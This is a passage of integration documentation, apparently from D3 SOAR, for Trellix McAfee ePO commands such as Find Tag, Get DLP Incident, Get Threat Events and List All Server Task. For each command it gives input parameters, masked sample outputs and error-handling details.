Message: Expecting value: line 1 column 1 (char 0).

Error Sample Data

Find Systems By Group IDs failed.

Status Code: 400.

Message: Expecting value: line 1 column 1 (char 0).

Find Tag

Retrieves tag information based on the provided search text.

Input

Input Parameter

Required/Optional

Description

Example

Search Text

Optional

The search text containing the keywords to retrieve tag information. If there are no matches with the search keywords, the command will indicate success with no results.

TestTag

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "tagNotes": "",
        "tagId": 43,
        "tagName": "TestTag"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "tagNotes": "",
        "tagId": 43,
        "tagName": "TestTag"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "tagId": "\"[\\r\\n\\t\\t\\t43\\r\\n\\t\\t]\"",
    "tagName": "\"[\\r\\n\\t\\t\\t\\\"TestTag\\\"\\r\\n\\t\\t]\"",
    "tagNotes": "\"[\\r\\n\\t\\t\\t\\\"\\\"\\r\\n\\t\\t]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

tagNotes

tagId

tagName

43

TestTag

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find Tag failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Find Tag failed.

Status Code: 401.

Message: Unauthorized.

Get Device Info

Retrieves system information on the specified hosts.

Input

Input Parameter

Required/Optional

Description

Example

IPs or Hostnames

Optional

The IP addresses or hostnames to retrieve system information.

["1.1.1.1"]

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
No Sample Data
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
No Sample Data
Return Data

Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.

The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
No Sample Data

Error Handling

If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Get Device Info failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Get Device Info failed.

Status Code: 401.

Message: Unauthorized.

Get DLP Incident

Retrieves DLP incidents.

Input

Input Parameter

Required/Optional

Description

Example

Start Time

Optional

The start time of the time range to retrieve DLP incidents, in UTC time.

2021-01-11 00:00

End Time

Optional

The end time of the time range to retrieve DLP incidents, in UTC time.

2021-05-11 00:00

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "UDLP_Incidents.IncidentId": *****,
        "UDLP_EventUsers.UserName": "Administrator",
        "UDLP_Incidents.ComputerID": 2,
        "UDLP_EventComputers.Name": "*****-PC5",
        "UDLP_EventComputers.IP": "1.1.1.1",
        "UDLP_Incidents.IncidentType": 10000,
        "UDLP_Incidents.ViolationLocalTime": "2021-05-05T14:01:39-07:00",
        "UDLP_Incidents.ViolationTimezone": "Pacific Daylight Time",
        "UDLP_IncidentStatuses.StatusKey": "NEW",
        "UDLP_Incidents.TotalMatchCount": 0,
        "UDLP_Incidents.TotalContentSize": 0,
        "UDLP_Incidents.RulesToDisplay": "Plug and Play Device Rule",
        "UDLP_Incidents.PolicyInfoId": 4,
        "UDLP_Incidents.SourceApplicationId": null,
        "UDLP_Incidents.UserID": *****,
        "UDLP_Incidents.Severity": 1,
        "UDLP_Incidents.StatusId": "2",
        "UDLP_Incidents.ResolutionId": "1",
        "UDLP_Incidents.ActualAction": 0,
        "UDLP_Incidents.ExpectedAction": 0,
        "UDLP_Incidents.FailureReason": 0,
        "UDLP_Incidents.JustificationText": "",
        "UDLP_Incidents.McAfeeAgentGuid": "*****-*****-*****-*****-*****",
        "UDLP_Incidents.EvidenceCount": 0,
        "UDLP_Incidents.ReportingProduct": 1,
        "UDLP_Incidents.destination": "***** drives",
        "UDLP_Incidents.ShortMatchString": "",
        "UDLP_Incidents.DestinationUserID": null,
        "UDLP_Incidents.ExternalId": null,
        "UDLP_Incidents.ActivityEnum": null,
        "UDLP_EventUsers.PrimaryUserAccountID": "*****-PC5\\Administrator@",
        "UDLP_EventUsers.Username_NTLM": "*****-PC5\\Administrator",
        "UDLP_EventUsers.FQDN": null,
        "UDLP_EventUsers.SID": null,
        "UDLP_EventUsers.UID": null,
        "UDLP_EventUsers.UserOU": "",
        "UDLP_EventUsers.FirstName": null,
        "UDLP_EventUsers.LastName": null,
        "UDLP_EventUsers.PrimaryEmailAddress": "",
        "UDLP_EventUsers.UserTitle": "",
        "UDLP_EventUsers.UserBusinessUnit": null,
        "UDLP_EventUsers.UserDepartment": "",
        "UDLP_EventUsers.UserCity": null,
        "UDLP_EventUsers.UserCountry": null,
        "UDLP_EventUsers.UserCompany": null,
        "UDLP_EventUsers.UserManagerAccountID": "",
        "UDLP_EventUsers.DLPReviewerUserAccount": null,
        "UDLP_EventUsers.Custom1": null,
        "UDLP_EventUsers.Custom2": null,
        "UDLP_EventUsers.Custom3": null,
        "UDLP_EventUsers.UserStatus": null,
        "UDLP_EventUsers.LastDayInOffice": null,
        "UDLP_EventUsers.LastDayInOfficeYYYYMM": null,
        "UDLP_EventUsers.LastUpdated": null,
        "UDLP_EventUsers.LastUpdatedBy": null,
        "UDLP_EventUsers.LastUpdatedMethod": null,
        "UDLP_EventUsers.UserGroups": "Administrators"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "UDLP_Incidents.IncidentId": *****,
        "UDLP_EventUsers.UserName": "Administrator",
        "UDLP_Incidents.ComputerID": 2,
        "UDLP_EventComputers.Name": "*****-PC5",
        "UDLP_EventComputers.IP": "1.1.1.1",
        "UDLP_Incidents.IncidentType": 10000,
        "UDLP_Incidents.ViolationLocalTime": "2021-05-05T14:01:39-07:00",
        "UDLP_Incidents.ViolationTimezone": "Pacific Daylight Time",
        "UDLP_IncidentStatuses.StatusKey": "NEW",
        "UDLP_Incidents.TotalMatchCount": 0,
        "UDLP_Incidents.TotalContentSize": 0,
        "UDLP_Incidents.RulesToDisplay": "Plug and Play Device Rule",
        "UDLP_Incidents.PolicyInfoId": 4,
        "UDLP_Incidents.SourceApplicationId": null,
        "UDLP_Incidents.UserID": *****,
        "UDLP_Incidents.Severity": 1,
        "UDLP_Incidents.StatusId": "2",
        "UDLP_Incidents.ResolutionId": "1",
        "UDLP_Incidents.ActualAction": 0,
        "UDLP_Incidents.ExpectedAction": 0,
        "UDLP_Incidents.FailureReason": 0,
        "UDLP_Incidents.JustificationText": "",
        "UDLP_Incidents.McAfeeAgentGuid": "*****-*****-*****-*****-*****",
        "UDLP_Incidents.EvidenceCount": 0,
        "UDLP_Incidents.ReportingProduct": 1,
        "UDLP_Incidents.destination": "***** drives",
        "UDLP_Incidents.ShortMatchString": "",
        "UDLP_Incidents.DestinationUserID": null,
        "UDLP_Incidents.ExternalId": null,
        "UDLP_Incidents.ActivityEnum": null,
        "UDLP_EventUsers.PrimaryUserAccountID": "*****-PC5\\Administrator@",
        "UDLP_EventUsers.Username_NTLM": "*****-PC5\\Administrator",
        "UDLP_EventUsers.FQDN": null,
        "UDLP_EventUsers.SID": null,
        "UDLP_EventUsers.UID": null,
        "UDLP_EventUsers.UserOU": "",
        "UDLP_EventUsers.FirstName": null,
        "UDLP_EventUsers.LastName": null,
        "UDLP_EventUsers.PrimaryEmailAddress": "",
        "UDLP_EventUsers.UserTitle": "",
        "UDLP_EventUsers.UserBusinessUnit": null,
        "UDLP_EventUsers.UserDepartment": "",
        "UDLP_EventUsers.UserCity": null,
        "UDLP_EventUsers.UserCountry": null,
        "UDLP_EventUsers.UserCompany": null,
        "UDLP_EventUsers.UserManagerAccountID": "",
        "UDLP_EventUsers.DLPReviewerUserAccount": null,
        "UDLP_EventUsers.Custom1": null,
        "UDLP_EventUsers.Custom2": null,
        "UDLP_EventUsers.Custom3": null,
        "UDLP_EventUsers.UserStatus": null,
        "UDLP_EventUsers.LastDayInOffice": null,
        "UDLP_EventUsers.LastDayInOfficeYYYYMM": null,
        "UDLP_EventUsers.LastUpdated": null,
        "UDLP_EventUsers.LastUpdatedBy": null,
        "UDLP_EventUsers.LastUpdatedMethod": null,
        "UDLP_EventUsers.UserGroups": "Administrators"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "IncidentIds": "\"[27,26]\"",
    "IncidentTypes": "\"[10000,10000]\"",
    "ComputerNames": "\"[\\\"*****-PC5\\\",\\\"EPO-*****\\\"]\"",
    "ComputerIPs": "\"[\\\"1.1.1.1\\\",\\\"1.1.1.1\\\"]\"",
    "ViolationLocalTimes": "\"[\\\"2021-05-05T14:01:39-07:00\\\",\\\"2021-05-05T12:24:20-07:00\\\"]\"",
    "UserNames": "\"[\\\"Administrator\\\",\\\"Administrator\\\"]\"",
    "Severities": "\"[\\\"warning\\\",\\\"major\\\"]\"",
    "ActualActions": "\"[0,0]\"",
    "ExpectedActions": "\"[0,0]\"",
    "StatusKeys": "\"[\\\"NEW\\\",\\\"NEW\\\"]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

UDLP_INCIDENTS.INCIDENTID

UDLP_EVENTUSERS.USERNAME

UDLP_INCIDENTS.COMPUTERID

UDLP_EVENTCOMPUTERS.NAME

UDLP_EVENTCOMPUTERS.IP

UDLP_INCIDENTS.INCIDENTTYPE

UDLP_INCIDENTS.VIOLATIONLOCALTIME

UDLP_INCIDENTS.VIOLATIONTIMEZONE

UDLP_INCIDENTSTATUSES.STATUSKEY

UDLP_INCIDENTS.TOTALMATCHCOUNT

UDLP_INCIDENTS.TOTALCONTENTSIZE

UDLP_INCIDENTS.RULESTODISPLAY

UDLP_INCIDENTS.POLICYINFOID

UDLP_INCIDENTS.SOURCEAPPLICATIONID

UDLP_INCIDENTS.USERID

UDLP_INCIDENTS.SEVERITY

UDLP_INCIDENTS.STATUSID

UDLP_INCIDENTS.RESOLUTIONID

UDLP_INCIDENTS.ACTUALACTION

UDLP_INCIDENTS.EXPECTEDACTION

UDLP_INCIDENTS.FAILUREREASON

UDLP_INCIDENTS.JUSTIFICATIONTEXT

UDLP_INCIDENTS.MCAFEEAGENTGUID

UDLP_INCIDENTS.EVIDENCECOUNT

UDLP_INCIDENTS.REPORTINGPRODUCT

UDLP_INCIDENTS.DESTINATION

UDLP_INCIDENTS.SHORTMATCHSTRING

UDLP_INCIDENTS.DESTINATIONUSERID

UDLP_INCIDENTS.EXTERNALID

UDLP_INCIDENTS.ACTIVITYENUM

UDLP_EVENTUSERS.PRIMARYUSERACCOUNTID

UDLP_EVENTUSERS.USERNAME_NTLM

UDLP_EVENTUSERS.FQDN

UDLP_EVENTUSERS.SID

UDLP_EVENTUSERS.UID

UDLP_EVENTUSERS.USEROU

UDLP_EVENTUSERS.FIRSTNAME

UDLP_EVENTUSERS.LASTNAME

UDLP_EVENTUSERS.PRIMARYEMAILADDRESS

UDLP_EVENTUSERS.USERTITLE

UDLP_EVENTUSERS.USERBUSINESSUNIT

UDLP_EVENTUSERS.USERDEPARTMENT

UDLP_EVENTUSERS.USERCITY

UDLP_EVENTUSERS.USERCOUNTRY

UDLP_EVENTUSERS.USERCOMPANY

UDLP_EVENTUSERS.USERMANAGERACCOUNTID

UDLP_EVENTUSERS.DLPREVIEWERUSERACCOUNT

UDLP_EVENTUSERS.CUSTOM1

UDLP_EVENTUSERS.CUSTOM2

UDLP_EVENTUSERS.CUSTOM3

UDLP_EVENTUSERS.USERSTATUS

UDLP_EVENTUSERS.LASTDAYINOFFICE

UDLP_EVENTUSERS.LASTDAYINOFFICEYYYYMM

UDLP_EVENTUSERS.LASTUPDATED

UDLP_EVENTUSERS.LASTUPDATEDBY

UDLP_EVENTUSERS.LASTUPDATEDMETHOD

UDLP_EVENTUSERS.USERGROUPS

27

Administrator

2

***-PC5

1.1.1.1

10000

5/5/2021 2:01:39 PM

Pacific Daylight Time

NEW

0

0

Plug and Play Device Rule

4

1***

1

2

1

0

0

0

***-***-***-***-***

0

1

***es

***-PC5\Administrator@

***-PC5\Administrator

Administrators

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Get DLP Incident failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Get DLP Incident failed.

Status Code: 401.

Message: Unauthorized.

Get Task Info By Product Object

Retrieves task information based on the provided product name and object name.

Input

Input Parameter

Required/Optional

Description

Example

Product Name

Required

The name of the product to retrieve task information.

Endpoint Security Threat Prevention

Object Name

Required

The name of the object to retrieve task information.

On-Demand Scan - Quick Scan

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "productId": "*****",
        "typeName": "Endpoint Security Threat Prevention: Policy Based On-Demand Scan",
        "objectName": "On-Demand Scan - Full Scan",
        "typeId": *****,
        "objectId": *****,
        "productName": "Endpoint Security Threat Prevention "
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

D3 customizes the context data by extracting "productId" and "objectId" fields.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "productId": "*****",
    "objectId": *****
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "productId": "\"*****\"",
    "objectId": "\"*****\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

productName

Endpoint Security Threat Prevention

objectName

On-Demand Scan - Quick Scan

productId

***

objectId

***

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Get Task Info By Product Object failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 404.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Can not get Task info by given productName and objectName.

Error Sample Data

Get Task Info By Product Object failed.

Status Code: 404.

Message: Can not get Task info by given productName and objectName.

Get Threat Events

Retrieves threat events based on the specified criteria.

Input

Input Parameter

Required/Optional

Description

Example

Event Time

Optional

The timestamp to retrieve events, in UTC time.

2019-11-24 00:00

Time Before

Optional

The amount of time prior to the specified event time to retrieve events.

-3d

Time After

Optional

The amount of time after the specified event time to retrieve events.

2d

IP Addresses

Optional

The IP addresses to retrieve relevant events.

["1.1.1.1"]

Unhandled or All Threats?

Optional

The option to retrieve only unhandled threats or all threats.

unhandled

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "1.1.1.1": {
            "results": [
                {
                    "ReceivedUTC": "2019-11-25T16:03:54-08:00",
                    "DetectedUTC": "2019-11-25T16:02:33-08:00",
                    "AutoID": *****,
                    "SourceIPV4": "1.1.1.1",
                    "SourceUserName": null,
                    "SourceURL": null,
                    "TargetHostName": "*****-DC",
                    "TargetIPV4": "1.0.0.0",
                    "TargetUserName": "administrator",
                    "TargetPort": null,
                    "TargetProtocol": null,
                    "TargetProcessName": null,
                    "TargetFileName": null,
                    "ThreatCategory": "av.*****",
                    "ThreatEventID": *****,
                    "ThreatSeverity": 2,
                    "ThreatName": "PS/*****",
                    "ThreatType": "*****",
                    "ThreatActionTaken": "*****",
                    "ThreatHandled": false,
                    "AnalyzerDetectionMethod": "*****",
                    "Raw": "{'ReceivedUTC': '2019-11-25T16:03:54-08:00', 'DetectedUTC': '2019-11-25T16:02:33-08:00'}"
            ]
        }
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "1.1.1.1": {
            "results": [
                {
                    "ReceivedUTC": "2019-11-25T16:03:54-08:00",
                    "DetectedUTC": "2019-11-25T16:02:33-08:00",
                    "AutoID": *****,
                    "SourceIPV4": "1.1.1.1",
                    "SourceUserName": null,
                    "SourceURL": null,
                    "TargetHostName": "*****-DC",
                    "TargetIPV4": "1.0.0.0",
                    "TargetUserName": "administrator",
                    "TargetPort": null,
                    "TargetProtocol": null,
                    "TargetProcessName": null,
                    "TargetFileName": null,
                    "ThreatCategory": "av.*****",
                    "ThreatEventID": *****,
                    "ThreatSeverity": 2,
                    "ThreatName": "PS/*****",
                    "ThreatType": "*****",
                    "ThreatActionTaken": "*****",
                    "ThreatHandled": false,
                    "AnalyzerDetectionMethod": "*****",
                    "Raw": "{'ReceivedUTC': '2019-11-25T16:03:54-08:00', 'DetectedUTC': '2019-11-25T16:02:33-08:00'}"
            ]
        }
    }
]
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

1.1.1.1

{
";results";: [
{
";ReceivedUTC";: ";2019-11-25T16:03:54-08:00";,
";DetectedUTC";: ";2019-11-25T16:02:33-08:00";,
";AutoID";: *****,
";SourceIPV4";: ";1.0.0.0";,
";SourceUserName";: null,
";SourceURL";: null,
";TargetHostName";: ";*****-DC";,
";TargetIPV4";: ";1.1.1.1";,
";TargetUserName";: ";administrator";,
";TargetPort";: null,
";TargetProtocol";: null,
";TargetProcessName";: null,
";TargetFileName";: null,
";ThreatCategory";: ";av.*****";,
";ThreatEventID";: *****,
";ThreatSeverity";: 2,
";ThreatName";: ";PS/*****";,
";ThreatType";: ";******";,
";ThreatActionTaken";: ";****";,
";ThreatHandled";: false,
";AnalyzerDetectionMethod";: ";*****";,
";Raw";: ";{'ReceivedUTC': '2019-11-25T16:03:54-08:00', 'DetectedUTC': '2019-11-25T16:02:33-08:00'}";
}
]
}

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Get Threat Events failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Get Threat Events failed.

Status Code: 401.

Message: Unauthorized.

Get Version

Retrieves the ePO version.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
No Sample Data
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
No Sample Data
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
No Sample Data

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Get Version failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Get Version failed.

Status Code: 401.

Message: Unauthorized.

List All Server Task

Retrieves a list of all server tasks.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "id": *****,
        "name": "Update Master Repository",
        "description": "This default task updates the master repository from the McAfee update site (McAfeeHttp).",
        "startDate": "2018-02-14T00:00:01-08:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T01:41:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": *****,
        "name": "TIE Server Telemetry",
        "description": "TIE Server telemetry process to collect and transmit data from remote points.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": *****,
        "name": "TIE Server Synchronize Topology",
        "description": "It manages the synchronization of the TIE Server Topology in a multi-ePO environment.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": ******,
        "name": "TIE Server Synchronize CA",
        "description": "It manages the synchronization of the TIE Server CAs in a multi-ePO environment.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "id": *****,
        "name": "Update Master Repository",
        "description": "This default task updates the master repository from the McAfee update site (McAfeeHttp).",
        "startDate": "2018-02-14T00:00:01-08:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T01:41:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": *****,
        "name": "TIE Server Telemetry",
        "description": "TIE Server telemetry process to collect and transmit data from remote points.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": *****,
        "name": "TIE Server Synchronize Topology",
        "description": "It manages the synchronization of the TIE Server Topology in a multi-ePO environment.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    },
    {
        "id": ******,
        "name": "TIE Server Synchronize CA",
        "description": "It manages the synchronization of the TIE Server CAs in a multi-ePO environment.",
        "startDate": "2019-06-05T00:00:01-07:00",
        "endDate": "None",
        "nextRunTime": "2019-12-17T00:15:00-08:00",
        "enabled": true,
        "valid": true
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\\"id\\\":*****,\\\"name\\\":\\\"Update Master Repository\\\",\\\"description\\\":\\\"This default task updates the Master Repository from the McAfee update site (McAfeeHttp).\\\",\\\"startDate\\\":\\\"2022-04-21T03:00:01-04:00\\\",\\\"endDate\\\":\\\"None\\\",\\\"nextRunTime\\\":\\\"2022-12-16T03:09:00-05:00\\\",\\\"enabled\\\":true,\\\"valid\\\":true},{\\\"id\\\":*****,\\\"name\\\":\\\"TIE Server Telemetry\\\",\\\"description\\\":\\\"TIE Server telemetry process to collect and transmit data from remote points.\\\",\\\"startDate\\\":\\\"2022-04-22T03:00:01-04:00\\\",\\\"endDate\\\":\\\"None\\\",\\\"nextRunTime\\\":\\\"2022-12-16T03:15:00-05:00\\\",\\\"enabled\\\":true,\\\"valid\\\":true},{\\\"id\\\":*****,\\\"name\\\":\\\"TIE Server Synchronize Topology\\\",\\\"description\\\":\\\"It manages the synchronization of the TIE Server Topology in a multi-ePO environment.\\\",\\\"startDate\\\":\\\"2022-04-22T03:00:01-04:00\\\",\\\"endDate\\\":\\\"None\\\",\\\"nextRunTime\\\":\\\"2022-12-16T03:15:00-05:00\\\",\\\"enabled\\\":true,\\\"valid\\\":true},{\\\"id\\\":*****,\\\"name\\\":\\\"TIE Server Synchronize CA\\\",\\\"description\\\":\\\"It manages the synchronization of the TIE Server CAs in a multi-ePO environment.\\\",\\\"startDate\\\":\\\"2022-04-22T03:00:01-04:00\\\",\\\"endDate\\\":\\\"None\\\",\\\"nextRunTime\\\":\\\"2022-12-16T03:15:00-05:00\\\",\\\"enabled\\\":true,\\\"valid\\\":true}}]\\r\\n\"",
    "description": "\"[\\r\\n \\r\\n  \\\"This default task updates the master repository from the McAfee update site (McAfeeHttp).\\\",\\r\\n \\r\\n  \\\"TIE Server telemetry process to collect and transmit data from remote points.\\\",\\r\\n \\r\\n  \\\"It manages the synchronization of the TIE Server Topology in a multi-ePO environment.\\\",\\r\\n \\r\\n  \\\"It manages the synchronization of the TIE Server CAs in a multi-ePO environment.\\\",\\r\\n \\r\\n  \\\"TIE Server monitoring mechanism to save events.\\\",\\r\\n \\r\\n  \\\"TIE Server Database Maintenance trigger.\\\",\\r\\n \\r\\n  \\\"TIE Server Data Management cleanup trigger.\\\",\\r\\n \\r\\n  \\\"Synchronize client tasks among designated registered servers.\\\",\\r\\n \\r\\n  \\\"Synchronize policies among designated registered servers.\\\",\\r\\n \\r\\n  \\\"Send the current DXL State event to the DXL Fabric\\\",\\r\\n \\r\\n  \\\"Sends the full list of certificates revoked by the administrator. This task should be run after every new broker deployment.\\\",\\r\\n \\r\\n  \\\"This default task creates roll-up data for this ePO server for inclusion in multi-server 